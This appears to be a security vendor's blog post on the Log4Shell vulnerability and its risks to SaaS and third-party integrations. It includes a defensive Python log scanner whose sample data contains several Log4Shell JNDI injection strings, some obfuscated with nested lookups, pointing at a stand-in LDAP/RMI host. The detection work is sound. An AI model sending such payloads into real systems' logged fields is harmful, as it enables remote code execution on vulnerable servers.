How Log4j May Impact Your SaaS and 3rd-Party Apps - and What You Can Do
Log4Shell (CVE-2021-44228) is a critical vulnerability in Log4j, a widely used open-source logging library, and its impact can be far-reaching and costly. Organizations of all sizes, from small online retailers to the most recognized brands to government agencies, are affected. One of AppOmni’s core values is to build trust through transparency, which includes offering information and perspective on security issues. Read on for our take on the Log4j vulnerability and what organizations can do to protect their systems.
What is Log4j?
Log4j 2 is an open-source, Java-based logging framework maintained by the Apache Software Foundation. It is popular with commercial software developers and, being Java, runs on every platform with a Java runtime, including Windows, Linux, and macOS. A critical vulnerability in it, CVE-2021-44228 (widely known as Log4Shell), was reported privately to Apache in late November 2021 and publicly disclosed on December 9, 2021. Affected versions (2.0-beta9 through 2.14.1) perform JNDI lookups on strings such as ${jndi:ldap://attacker-host/object} when they appear in a logged message, so an unauthenticated attacker who can get such a string into any field the application logs (a username, a User-Agent or other HTTP header, a chat message) can make the server fetch and execute attacker-supplied code. In practice this means remote code execution on any system that logs attacker-controlled input through an affected version, and the vulnerability is being exploited by bad actors worldwide.
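The lookup string described above is also what defenders hunt for in web server and application logs. The following Python script is an added example, not code from the original article or from AppOmni. It runs over a handful of constructed request log lines (the addresses are documentation ranges, not real attacker hosts) and shows why matching on the literal text ${jndi: is not enough: it first undoes URL encoding and the ${lower:…}, ${upper:…} and ${…:-x} default-value lookups that attackers nest to hide the payload, then reports the decoded JNDI target.

```python
import re
from urllib.parse import unquote

# Constructed sample request log lines (not taken from the article). The
# last three carry the same payload hidden behind obfuscation tricks that
# were seen in the wild: nested case lookups, default-value lookups that
# spell "jndi" one letter at a time, and plain URL encoding.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/y}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fz%7D HTTP/1.1" 404 "curl/7.79"',
]

# ${lower:x} / ${upper:x}: Log4j case-conversion lookups with no nested lookup inside.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${key:-default}: a lookup that falls back to its default; attackers use an
# empty or unknown key so the expression evaluates to the default text.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The JNDI lookup we actually care about, once the layers above are removed.
_JNDI = re.compile(r"\$\{jndi:([^}]*)\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Peel the layers an attacker can stack on top of "${jndi:...}".

    Each round URL-decodes once and collapses one layer of ${lower:x},
    ${upper:x} and ${...:-x} lookups, innermost first, until the string
    stops changing. The round limit bounds the work done on hostile input.
    """
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == previous:
            break
    return text


def detect_jndi_lookup(line: str):
    """Return details of the decoded JNDI lookup in a log line, or None."""
    normalized = normalize(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    url = m.group(1)
    return {"scheme": url.split(":", 1)[0].lower(), "url": url, "normalized": normalized}


def scan(lines):
    """Scan log lines and return (1-based line number, finding) pairs."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := detect_jndi_lookup(line))]


if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {finding['scheme']} lookup -> {finding['url']}")
```

The normalizer only handles the three obfuscation layers shown; Log4j supports other lookups (${env:…}, ${sys:…}, ${date:…}) that can be abused the same way, so any remaining ${…} expression in a request field is worth flagging as suspicious even when this check returns nothing. Detection of this kind tells you who tried; it is not a substitute for patching or for confirming a vendor's status.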
Are SaaS applications impacted?
Many technologies are impacted, including firewalls, servers, video conferencing platforms, and more. SaaS applications are no exception: many SaaS vendors ship Log4j somewhere in their platform and are working to mitigate the impact on their customers. Because the vulnerable code runs on the vendor’s infrastructure, customers cannot patch it themselves; what they can do is confirm each vendor’s status and apply any mitigations the vendor recommends. CISA maintains a list of applications with their Log4j vulnerability status along with information on vendor updates.
Are third-party apps affected?
Third-party integrations into SaaS applications can be vulnerable too, and they often hold broad permissions: many can read, write, and delete sensitive data, and some can reach user groups, workspaces, or multiple areas of the corporate network. A compromised integration inherits all of that access. Third-party apps also bring their own management problems: it is often unclear which apps are approved, what permissions each app holds, who can install an app, and what users are doing with the data the apps access.
What are the potential vulnerabilities to SaaS applications?
There are several ways the Log4j vulnerability could be turned against SaaS applications:
- An attacker who gains code execution through Log4j could change access and/or security settings within a SaaS application, for example by turning off encryption or granting someone access to data they shouldn’t have.
- Data, including usernames and passwords, could be exported, deleted, or otherwise compromised.
- Data can also be compromised through third-party apps such as Data Loader in Salesforce, or other apps installed through application-specific marketplaces, if the app or the system it runs on uses a vulnerable Log4j.
- Other Log4j-related vulnerabilities continue to be discovered. The first fix, Log4j 2.15.0, was incomplete (CVE-2021-45046), and a denial-of-service flaw (CVE-2021-45105) and a further, lower-severity remote code execution issue (CVE-2021-44832) followed, so "patched once" is not the same as "current": track the Apache Log4j security advisories and update to the latest release the project recommends.